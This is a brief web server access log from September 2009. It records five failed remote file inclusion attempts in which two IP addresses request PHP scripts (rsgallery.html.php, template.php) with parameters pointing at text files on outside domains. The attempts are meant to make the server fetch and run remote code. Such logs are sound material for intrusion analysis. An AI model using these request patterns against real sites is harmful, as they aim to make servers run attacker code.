85.12.15.41 - - [11/Sep/2009:00:09:15 -0500] "GET /logs/access_log.1244764800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.12.15.41 - - [11/Sep/2009:00:09:15 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:09:21 -0500] "GET /template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:09:21 -0500] "GET /logs/access_log.1251763200/template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
125.247.60.3 - - [11/Sep/2009:00:09:25 -0500] "GET /logs/template.php?name=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
